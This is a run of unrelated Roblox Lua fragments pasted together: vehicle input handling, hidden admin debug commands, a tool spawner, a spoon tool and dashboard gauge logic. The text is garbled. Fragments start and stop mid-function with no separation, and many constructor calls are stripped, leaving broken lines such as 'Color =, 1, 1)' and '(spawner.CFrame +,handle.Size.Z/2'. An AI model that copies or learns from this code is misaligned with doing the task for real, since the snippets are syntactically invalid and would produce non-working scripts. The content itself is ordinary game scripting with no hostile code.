local UserInputService = game:GetService("UserInputService") local steer = 0 local throttle = 0 local brake = 0 local RTriggerValue = 0 local LTriggerValue = 0 stdz = script.Value local PositiveEdgeButton = { [Enum.KeyCode.ButtonL1]={f=function() if control.Value == "Controller" then if script.Parent.Storage.CurrentGear.Value ~= 1 then script.Parent.Functions.ShiftDownRequested.Value = true end print("DOWN") --ADD LOWER LIMIT [AND UPPER 4 OTHER 1] end end;deb=false}; [Enum.KeyCode.ButtonR1]={f=function() if control.Value == "Controller" then if script.Parent.Storage.CurrentGear.Value ~= script.Parent.Storage.AmountOfGears.Value +2 then script.Parent.Functions.ShiftUpRequested.Value = true end print("UP") end end;deb=false} } function DealWithInput(input,IsRobloxFunction) if input.UserInputType == Enum.UserInputType.Keyboard then local speed = carSeat.Velocity.magnitude if input.KeyCode == Enum.KeyCode.A then if input.UserInputState == Enum.UserInputState.Begin then elseif input.UserInputState == Enum.UserInputState.End then end end if input.KeyCode == Enum.KeyCode.D then if input.UserInputState == Enum.UserInputState.Begin then elseif input.UserInputState == Enum.UserInputState.End then end end if input.KeyCode == Enum.KeyCode.W then if input.UserInputState == Enum.UserInputState.Begin then elseif input.UserInputState == Enum.UserInputState.End then end end if input.KeyCode == Enum.KeyCode.S then if input.UserInputState == Enum.UserInputState.Begin then elseif input.UserInputState == Enum.UserInputState.End then end end end if input.KeyCode == Enum.KeyCode.ButtonX then if input.UserInputState == Enum.UserInputState.Begin then print("help me sonny") elseif input.UserInputState == Enum.UserInputState.End then end end if control.Value == "Keyboard" then local LRpix = math.max(1,mouse.ViewSizeX*67/200) local dZoe = 0.04 local MousePx = ((mouse.X-mouse.ViewSizeX/2)/LRpix) --print(MousePx) if math.abs(MousePx)<=dZoe then Gval = 0 else Gval = (math.max(math.min((math.abs(MousePx)-dZoe),(1-dZoe)),0)/(1-dZoe))^1 * (MousePx / math.abs(MousePx)) end --add if here ---mouse.Button1Down:connect(function() ---print("LeftClick") ---end) ---mouse.Button2Down:connect(function() ---print("RightClick") --end) end if control.Value == "Controller" then if input.UserInputType.Name:find("Gamepad") then -------- if input.KeyCode == Enum.KeyCode.Thumbstick1 then if input.Position.X > stdz.Value then if script.Parent.Storage.Control.Value == "Controller" then script.Parent.Storage.Steer.Value = (((input.Position.X)-stdz.Value)*(1/(1-stdz.Value))) end elseif input.Position.X < -stdz.Value then if script.Parent.Storage.Control.Value == "Controller" then script.Parent.Storage.Steer.Value = (((input.Position.X)+stdz.Value)*(1/(1-stdz.Value))) end else script.Parent.Storage.Steer.Value = 0 end elseif input.KeyCode == Enum.KeyCode.ButtonR2 then RTriggerValue = input.Position.Z script.Parent.Storage.Throttle.Throttle.Value = RTriggerValue elseif input.KeyCode == Enum.KeyCode.ButtonL2 then LTriggerValue = input.Position.Z script.Parent.Storage.Brake.Value = LTriggerValue elseif PositiveEdgeButton[input.KeyCode] then local fn = PositiveEdgeButton[input.KeyCode] if input.Position.Z > 0.5 and not fn.deb then fn.deb = true fn.f() elseif input.Position.Z < 0.5 then fn.deb = false end end end end end UserInputService.InputBegan:connect(DealWithInput) UserInputService.InputChanged:connect(DealWithInput) UserInputService.InputEnded:connect(DealWithInput)
--print("Scan Complete")
if doublescan then ScanForViruses(game,0,false) end
return function(Vargs, GetEnv) local env = GetEnv(nil, {script = script}) setfenv(1, env) local server = Vargs.Server; local service = Vargs.Service; local Settings = server.Settings local Functions, Commands, Admin, Anti, Core, HTTP, Logs, Remote, Process, Variables, Deps = server.Functions, server.Commands, server.Admin, server.Anti, server.Core, server.HTTP, server.Logs, server.Remote, server.Process, server.Variables, server.Deps Commands.TestError = { Hidden = true; Prefix = ":"; Commands = {"debugtesterror"}; Args = {"optional type (error/assert)", "optional message"}; Description = "Test Error"; NoFilter = true; AdminLevel = "Creators"; Function = function(plr: Player, args: {string}) --assert(args[1] and args[2],"Argument missing or nil") Remote.Send(plr, "TestError") Routine(function() plr.Bobobobobobobo.Hi = 1 end) if not args[1] then error("This is an intentional test error") elseif args[1]:lower() == "error" then error(args[2]) elseif args[1]:lower() == "assert" then assert(false, args[2]) end end; }; Commands.TestBigList = { Hidden = true; Prefix = ":"; Commands = {"debugtestbiglist"}; Args = {}; Description = "Test Big List"; AdminLevel = "Creators"; Function = function(plr: Player, args: {string}) local list = {} for i = 1, 5000 do table.insert(list, {Text = i}) end Remote.MakeGui(plr,"List",{ Title = "DebugBigList_PageSize250", Table = list, Font = "Code", PageSize = 250; Size = {500, 400}, }) Remote.MakeGui(plr,"List",{ Title = "DebugBigList_PageSize100", Table = list, Font = "Code", PageSize = 100; Size = {500, 400}, }) Remote.MakeGui(plr,"List",{ Title = "DebugBigList_PageSize25", Table = list, Font = "Code", PageSize = 25; Size = {500, 400}, }) end; }; Commands.TestGet = { Prefix = ":"; Commands = {"debugtestget"}; Args = {}; Description = "Remote Test"; Hidden = true; AdminLevel = "Creators"; Function = function(plr: Player, args: {string}) local tack = time() print(tack) print(Remote.Get(plr,"Test")) local tab = { { Children = { {Class = "sdfhasdfjkasjdf"} }; {{Something = "hi"}}; } } local m, ret = Remote.Get(plr, "Test", tab) if ret then print(ret) for i,v in next, ret do print(i,v) for i,v in next,v do print(i,v) for i,v in next,v do print(i,v) for i,v in next,v do print(i,v) end end end end end print(time() - tack) print("TESTING EVENT") Remote.MakeGui(plr, "Settings", { IsOwner = true }) local testColor = Remote.GetGui(plr, "ColorPicker", {Color =, 1, 1)}) print(testColor) local ans,event = Remote.GetGui(plr, "YesNoPrompt", { Icon = server.MatIcons["Bug report"]; Question = "Is this a test question?"; }), Remote.NewPlayerEvent(plr, "TestEvent", function(...) print("EVENT WAS FIRED; WE GOT:") print(...) print("THAT'D BE ALL") end) print("PLAYER ANSWER: "..tostring(ans)) wait(0.5) print("SENDING REMOTE EVENT TEST") Remote.Send(plr, "TestEvent", "TestEvent", "hi mom I went thru the interwebs") print("SENT") end; };
--// Add Viewport
function RotateViewportModule:AddViewport(viewport) spawn(function() if viewport:FindFirstChildWhichIsA("Model") ~= nil then local model = viewport:FindFirstChildWhichIsA("Model") if viewport:FindFirstChildWhichIsA("Camera") ~= nil then local camera = viewport:FindFirstChildWhichIsA("Camera") self:EndViewport() event = setRotationEvent(model, camera) end end end) end return RotateViewportModule
--local KVs = script.Parent.Parent.Parent.KVs
local callwait = 60 local config = script.Parent.Parent.Configuration local sys = script.Parent.Parent.System function off() --- huh.ERROR:Play() folder.KV.Value.Value = "OFF" wait(1) folder.KV.Value.Value = "" --- end function err() --- huh.ERROR:Play() folder.KV.Value.Value = "Err" wait(1) folder.KV.Value.Value = "" --- end function usercodefalse() --- huh.ERROR:Play() folder.KV.Value.Value = "OFF" wait(1) folder.KV.Value.Value = "" --- end function open() --- huh.Open:Play() folder.KV.Value.Value = "OPen" wait(1.02) folder.KV.Value.Value = "" --- end function kventer() if sys.Code.Value == false then sys.KVEnter.Value = true end end
-- See if I have a tool
local spawner = script.Parent local tool = nil local region = - spawner.Size.X/2, spawner.Position.Y + spawner.Size.Y/2, spawner.Position.Z - spawner.Size.Z/2), + spawner.Size.X/2, spawner.Position.Y + 4, spawner.Position.Z + spawner.Size.Z/2)) local parts = game.Workspace:FindPartsInRegion3(region) for _, part in pairs(parts) do if part and part.Parent and part.Parent:IsA("Tool") then tool = part.Parent break end end local configTable = spawner.Configurations local configs = {} local function loadConfig(configName, defaultValue) if configTable:FindFirstChild(configName) then configs[configName] = configTable:FindFirstChild(configName).Value else configs[configName] = defaultValue end end loadConfig("SpawnCooldown", 5) if tool then tool.Parent = game.ServerStorage while true do -- put tool on pad local toolCopy = tool:Clone() local handle = toolCopy:FindFirstChild("Handle") toolCopy.Parent = game.Workspace local toolOnPad = true local parentConnection parentConnection = toolCopy.AncestryChanged:connect(function() if handle then handle.Anchored = false end toolOnPad = false parentConnection:disconnect() end) if handle then handle.CFrame = (spawner.CFrame +,handle.Size.Z/2 + 1,0)) * CFrame.Angles(-math.pi/2,0,0) handle.Anchored = true end -- wait for tool to be removed while toolOnPad do if handle and not handle.Anchored then -- another script unachored the weapon while it was on the pad handle.Anchored = true handle.CFrame = (spawner.CFrame +,handle.Size.Z/2 + 1,0)) * CFrame.Angles(-math.pi/2,0,0) end if handle then handle.CFrame = handle.CFrame * CFrame.Angles(0,0,math.pi/60) end wait() end -- wait for cooldown wait(configs["SpawnCooldown"]) end end
--Made by Stickmasterluke ;D
sp=script.Parent local debris=game:GetService("Debris") check=true sp.Equipped:connect(function(mouse) equipped=true if mouse~=nil then mouse.Icon="rbxasset://textures\\GunCursor.png" mouse.Button1Down:connect(function() local chr=sp.Parent if chr and check then local t=chr:FindFirstChild("Torso") local h=chr:FindFirstChild("Humanoid") local anim=sp:FindFirstChild("Eat") if anim and t and h and h.Health>0 and equipped and check then mouse.Icon="rbxasset://textures\\GunWaitCursor.png" check=false anim2=h:LoadAnimation(anim) anim2:Play() local handle=sp:FindFirstChild("Handle") if handle~=nil then local mesh=handle:FindFirstChild("Mesh") end wait(2) local s=sp.Handle:FindFirstChild("Sound") if s~=nil and equipped and w~=nil then,-1,-.3)*CFrame.Angles(-.3,0,math.pi/4) else check=true return end local s=sp.Handle:FindFirstChild("Sound") if s~=nil and equipped and w~=nil then,-1,-.3)*CFrame.Angles(-.3,0,math.pi/4) else check=true return end wait(3) if mouse~=nil then mouse.Icon="rbxasset://textures\\GunCursor.png" end check=true end end end) end delay(0,function() local la=sp.Parent:FindFirstChild("Left Arm") if la~=nil then if spoon then spoon:remove() end"Part") spoon.FormFactor="Custom" spoon.Name="Handle",.2,1.3) spoon.TopSurface="Smooth" spoon.BottomSurface="Smooth" spoon.CanCollide=false local"SpecialMesh") m.MeshId="" m.TextureId= "" m.Parent=spoon"Motor") w.Part0=la w.Part1=spoon,-1,-.3)*CFrame.Angles(0,0,math.pi/4) w.Parent=spoon debris:AddItem(spoon,600) spoon.Parent=game.Workspace end end) end) sp.Unequipped:connect(function() equipped=false if anim2 then anim2:Stop() end if spoon then spoon:remove() end end)
--[[ Returns the current health of the server ( 20 ticks == healthy frien :> ) --]]
while wait(1) do print(total_updates) total_updates = 0 end
local WheelieButton = "LeftControl" local DeadZone = 380
--Automatic Gauge Scaling
if autoscaling then local Drive={} if _Tune.Config == "FWD" or _Tune.Config == "AWD" then if car.Wheels:FindFirstChild("FL")~= nil then table.insert(Drive,car.Wheels.FL) end if car.Wheels:FindFirstChild("FR")~= nil then table.insert(Drive,car.Wheels.FR) end if car.Wheels:FindFirstChild("F")~= nil then table.insert(Drive,car.Wheels.F) end end if _Tune.Config == "RWD" or _Tune.Config == "AWD" then if car.Wheels:FindFirstChild("RL")~= nil then table.insert(Drive,car.Wheels.RL) end if car.Wheels:FindFirstChild("RR")~= nil then table.insert(Drive,car.Wheels.RR) end if car.Wheels:FindFirstChild("R")~= nil then table.insert(Drive,car.Wheels.R) end end local wDia = 0 for i,v in pairs(Drive) do if v.Size.x>wDia then wDia = v.Size.x end end Drive = nil for i,v in pairs(UNITS) do v.maxSpeed = math.ceil(v.scaling*wDia*math.pi*_lRPM/60/_Tune.Ratios[#_Tune.Ratios]/_Tune.FinalDrive) v.spInc = math.max(math.ceil(v.maxSpeed/200)*20,20) end end for i=0,revEnd*2 do local ln = script.Parent.ln:clone() ln.Parent = script.Parent.Tach ln.Rotation = 45 + i * 225 / (revEnd*2) ln.Num.Text = i/2 ln.Num.Rotation = -ln.Rotation if i*500>=math.floor(_pRPM/500)*500 then ln.Frame.BackgroundColor3 =,0,0) if i<revEnd*2 then ln2 = ln:clone() ln2.Parent = script.Parent.Tach ln2.Rotation = 45 + (i+.5) * 225 / (revEnd*2) ln2.Num:Destroy() ln2.Visible=true end end if i%2==0 then ln.Frame.Size =,3,0,10) ln.Frame.Position =,-1,0,100) ln.Num.Visible = true else ln.Num:Destroy() end ln.Visible=true end local lns ="Frame",script.Parent.Speedo) lns.Name = "lns" lns.BackgroundTransparency = 1 lns.BorderSizePixel = 0 lns.Size =,0,0,0) for i=1,90 do local ln = script.Parent.ln:clone() ln.Parent = lns ln.Rotation = 45 + 225*(i/90) if i%2==0 then ln.Frame.Size =,2,0,10) ln.Frame.Position =,-1,0,100) else ln.Frame.Size =,3,0,5) end ln.Num:Destroy() ln.Visible=true end for i,v in pairs(UNITS) do local lnn ="Frame",script.Parent.Speedo) lnn.BackgroundTransparency = 1 lnn.BorderSizePixel = 0 lnn.Size =,0,0,0) lnn.Name = v.units if i~= 1 then lnn.Visible=false end for i=0,v.maxSpeed,v.spInc do local ln = script.Parent.ln:clone() ln.Parent = lnn ln.Rotation = 45 + 225*(i/v.maxSpeed) ln.Num.Text = i ln.Num.TextSize = 14 ln.Num.Rotation = -ln.Rotation ln.Frame:Destroy() ln.Num.Visible=true ln.Visible=true end end if script.Parent.Parent.IsOn.Value then script.Parent:TweenPosition(, 0, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end script.Parent.Parent.IsOn.Changed:connect(function() if script.Parent.Parent.IsOn.Value then script.Parent:TweenPosition(, 0, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end end) script.Parent.Parent.Values.RPM.Changed:connect(function() script.Parent.Tach.Needle.Rotation = 45 + 225 * math.min(1,script.Parent.Parent.Values.RPM.Value / (revEnd*1000)) intach.Rotation = -30 + script.Parent.Parent.Values.RPM.Value * 240 / 8000 end) script.Parent.Parent.Values.Gear.Changed:connect(function() local gearText = script.Parent.Parent.Values.Gear.Value if gearText == 0 then gearText = "N" car.Body.Dash.DashSc.G.Modes.Info.Gear.Text = "N" car.Body.Dash.DashSc.G.Modes.SpeedStats.Gear.Text = "N" elseif gearText == -1 then gearText = "R" car.Body.Dash.DashSc.G.Modes.Info.Gear.Text = "R" car.Body.Dash.DashSc.G.Modes.SpeedStats.Gear.Text = "R" end script.Parent.Gear.Text = gearText car.Body.Dash.DashSc.G.Modes.Info.Gear.Text = gearText car.Body.Dash.DashSc.G.Modes.SpeedStats.Gear.Text = gearText end) script.Parent.Parent.Values.TCS.Changed:connect(function() if _Tune.TCSEnabled then if script.Parent.Parent.Values.TCS.Value then script.Parent.TCS.TextColor3 =,170/255,0) script.Parent.TCS.TextStrokeColor3 =,170/255,0) if script.Parent.Parent.Values.TCSActive.Value then wait() script.Parent.TCS.Visible = not script.Parent.TCS.Visible else wait() script.Parent.TCS.Visible = false end else script.Parent.TCS.Visible = true script.Parent.TCS.TextColor3 =,0,0) script.Parent.TCS.TextStrokeColor3 =,0,0) end else script.Parent.TCS.Visible = false end end) script.Parent.Parent.Values.TCSActive.Changed:connect(function() if _Tune.TCSEnabled then if script.Parent.Parent.Values.TCSActive.Value and script.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = not script.Parent.TCS.Visible elseif not script.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = true else wait() script.Parent.TCS.Visible = false end else script.Parent.TCS.Visible = false end end) script.Parent.TCS.Changed:connect(function() if _Tune.TCSEnabled then if script.Parent.Parent.Values.TCSActive.Value and script.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = not script.Parent.TCS.Visible elseif not script.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = true end else if script.Parent.TCS.Visible then script.Parent.TCS.Visible = false end end end) script.Parent.Parent.Values.ABS.Changed:connect(function() if _Tune.ABSEnabled then if script.Parent.Parent.Values.ABS.Value then script.Parent.ABS.TextColor3 =,170/255,0) script.Parent.ABS.TextStrokeColor3 =,170/255,0) if script.Parent.Parent.Values.ABSActive.Value then wait() script.Parent.ABS.Visible = not script.Parent.ABS.Visible else wait() script.Parent.ABS.Visible = false end else script.Parent.ABS.Visible = true script.Parent.ABS.TextColor3 =,0,0) script.Parent.ABS.TextStrokeColor3 =,0,0) end else script.Parent.ABS.Visible = false end end) script.Parent.Parent.Values.ABSActive.Changed:connect(function() if _Tune.ABSEnabled then if script.Parent.Parent.Values.ABSActive.Value and script.Parent.Parent.Values.ABS.Value then wait() script.Parent.ABS.Visible = not script.Parent.ABS.Visible elseif not script.Parent.Parent.Values.ABS.Value then wait() script.Parent.ABS.Visible = true else wait() script.Parent.ABS.Visible = false end else script.Parent.ABS.Visible = false end end) script.Parent.ABS.Changed:connect(function() if _Tune.ABSEnabled then if script.Parent.Parent.Values.ABSActive.Value and script.Parent.Parent.Values.ABS.Value then wait() script.Parent.ABS.Visible = not script.Parent.ABS.Visible elseif not script.Parent.Parent.Values.ABS.Value then wait() script.Parent.ABS.Visible = true end else if script.Parent.ABS.Visible then script.Parent.ABS.Visible = false end end end) script.Parent.Parent.Values.PBrake.Changed:connect(function() script.Parent.PBrake.Visible = script.Parent.Parent.Values.PBrake.Value end) script.Parent.Parent.Values.TransmissionMode.Changed:connect(function() if script.Parent.Parent.Values.TransmissionMode.Value == "Auto" then script.Parent.TMode.Text = "A/T" script.Parent.TMode.BackgroundColor3 =,170/255,0) elseif script.Parent.Parent.Values.TransmissionMode.Value == "Semi" then script.Parent.TMode.Text = "S/T" script.Parent.TMode.BackgroundColor3 =, 170/255, 127/255) else script.Parent.TMode.Text = "M/T" script.Parent.TMode.BackgroundColor3 =,85/255,.5) end end) script.Parent.Parent.Values.Velocity.Changed:connect(function(property) script.Parent.Speedo.Needle.Rotation = 45 + 225 * math.min(1,UNITS[currentUnits].scaling*script.Parent.Parent.Values.Velocity.Value.Magnitude/UNITS[currentUnits].maxSpeed) script.Parent.Speed.Text = math.floor(UNITS[currentUnits].scaling*script.Parent.Parent.Values.Velocity.Value.Magnitude) .. " "..UNITS[currentUnits].units inspd.Rotation = -30 + (240 / 160) * (math.abs(script.Parent.Parent.Values.Velocity.Value.Magnitude*((10/12) * (60/88)))) end) script.Parent.Speed.MouseButton1Click:connect(function() if currentUnits==#UNITS then currentUnits = 1 else currentUnits = currentUnits+1 end for i,v in pairs(script.Parent.Speedo:GetChildren()) do v.Visible=v.Name==UNITS[currentUnits].units or v.Name=="Needle" or v.Name=="lns" end script.Parent.Speed.Text = math.floor(UNITS[currentUnits].scaling*script.Parent.Parent.Values.Velocity.Value.Magnitude) .. " "..UNITS[currentUnits].units end) mouse.KeyDown:connect(function(key) if key=="v" then script.Parent.Visible=not script.Parent.Visible end end)